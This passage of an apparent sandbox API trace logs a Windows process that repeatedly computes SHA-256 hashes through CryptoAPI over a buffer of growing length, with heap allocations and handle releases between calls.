CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0183.575] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.575] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70da0 [0183.575] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e70da0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70da0, pdwDataLen=0xcdfdc) returned 1 [0183.575] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.575] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0183.575] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0183.575] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.575] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0183.575] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.576] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e717f0 [0183.576] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e717f0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e717f0, pdwDataLen=0xcdfdc) returned 1 [0183.576] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.576] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0183.576] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0183.576] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.576] CryptHashData (hHash=0x3396ecc0, pbData=0x32e786e0, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0183.576] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.576] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71df0 [0183.576] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x2, pbData=0x32e71df0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71df0, pdwDataLen=0xcdfdc) returned 1 [0183.576] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.576] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0183.576] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0183.577] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.577] CryptHashData (hHash=0x3396eb70, pbData=0x32e786e0, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0183.577] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.577] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71b20 [0183.577] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32e71b20, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71b20, pdwDataLen=0xcdfdc) returned 1 [0183.577] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.577] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0183.577] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0183.578] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.578] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0183.578] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71820 [0183.578] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71820, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71820, pdwDataLen=0xcdfdc) returned 1 [0183.578] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.578] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0183.578] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0183.578] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.578] CryptHashData (hHash=0x3396eb70, pbData=0x32e786e0, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0183.578] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71be0 [0183.578] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32e71be0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71be0, pdwDataLen=0xcdfdc) returned 1 [0183.578] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.578] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0183.578] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338236d0) returned 1 [0183.579] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.579] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0183.579] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.579] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71940 [0183.579] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71940, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71940, pdwDataLen=0xcdfdc) returned 1 [0183.579] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.579] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0183.579] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0183.580] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.580] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0183.580] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.580] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e719d0 [0183.580] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e719d0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e719d0, pdwDataLen=0xcdfdc) returned 1 [0183.580] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.580] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0183.580] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0183.581] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.581] CryptHashData (hHash=0x3396ee10, pbData=0x32e786e0, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0183.581] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.581] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71cd0 [0183.581] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32e71cd0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71cd0, pdwDataLen=0xcdfdc) returned 1 [0183.581] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.581] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0183.581] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338236d0) returned 1 [0183.670] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.670] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0183.670] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.670] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9c0 [0183.670] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e6c9c0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6c9c0, pdwDataLen=0xcdfdc) returned 1 [0183.670] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.670] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0183.670] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0183.671] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.671] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0183.671] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.671] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cab0 [0183.671] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e6cab0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6cab0, pdwDataLen=0xcdfdc) returned 1 [0183.671] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.671] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0183.671] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0183.672] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.672] CryptHashData (hHash=0x3396ee10, pbData=0x32e786e0, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0183.672] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.672] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71850 [0183.672] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32e71850, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71850, pdwDataLen=0xcdfdc) returned 1 [0183.672] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.672] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0183.673] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0183.673] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.673] CryptHashData (hHash=0x3396f510, pbData=0x32e786e0, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0183.673] CryptGetHashParam (in: hHash=0x3396f510, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.673] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71880 [0183.673] CryptGetHashParam (in: hHash=0x3396f510, dwParam=0x2, pbData=0x32e71880, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71880, pdwDataLen=0xcdfdc) returned 1 [0183.673] CryptDestroyHash (hHash=0x3396f510) returned 1 [0183.673] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0183.673] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338226d0) returned 1 [0183.674] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.674] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0183.674] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.674] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71e80 [0183.674] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e71e80, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71e80, pdwDataLen=0xcdfdc) returned 1 [0183.674] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.674] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0183.674] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0183.675] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.675] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0183.675] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.675] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71d00 [0183.675] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e71d00, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71d00, pdwDataLen=0xcdfdc) returned 1 [0183.675] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.675] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0183.675] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0183.676] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.676] CryptHashData (hHash=0x3396f660, pbData=0x32e786e0, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0183.676] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.676] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e718b0 [0183.676] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e718b0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e718b0, pdwDataLen=0xcdfdc) returned 1 [0183.676] CryptDestroyHash (hHash=0x3396f660) returned 1 [0183.676] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0183.676] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0183.676] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.676] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0183.676] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.676] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e718e0 [0183.676] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e718e0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e718e0, pdwDataLen=0xcdfdc) returned 1 [0183.676] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.676] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0183.676] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0183.677] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.677] CryptHashData (hHash=0x3396ee10, pbData=0x32e786e0, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0183.677] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.677] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71e20 [0183.677] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32e71e20, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71e20, pdwDataLen=0xcdfdc) returned 1 [0183.677] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.677] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0183.677] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338236d0) returned 1 [0183.678] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.678] CryptHashData (hHash=0x3396ea90, pbData=0x32e786e0, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0183.678] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.678] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71910 [0183.678] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e71910, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71910, pdwDataLen=0xcdfdc) returned 1 [0183.678] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0183.678] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0183.678] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338229d0) returned 1 [0183.678] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.678] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0183.678] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71b80 [0183.679] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e71b80, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71b80, pdwDataLen=0xcdfdc) returned 1 [0183.679] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.679] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0183.679] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338222d0) returned 1 [0183.679] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.679] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0183.679] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e719a0 [0183.679] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e719a0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e719a0, pdwDataLen=0xcdfdc) returned 1 [0183.679] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.679] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0183.679] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821dd0) returned 1 [0183.680] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.680] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0183.680] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.680] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71a90 [0183.680] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71a90, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71a90, pdwDataLen=0xcdfdc) returned 1 [0183.680] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.680] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0183.680] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0183.681] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.681] CryptHashData (hHash=0x3396ee10, pbData=0x32e786e0, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0183.681] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71970 [0183.681] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32e71970, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71970, pdwDataLen=0xcdfdc) returned 1 [0183.681] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.681] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0183.681] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0183.681] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.681] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0183.681] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71a60 [0183.681] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e71a60, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71a60, pdwDataLen=0xcdfdc) returned 1 [0183.682] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.682] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0183.682] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0183.682] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.682] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0183.682] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.682] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71e50 [0183.682] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71e50, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71e50, pdwDataLen=0xcdfdc) returned 1 [0183.682] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.682] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0183.682] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, 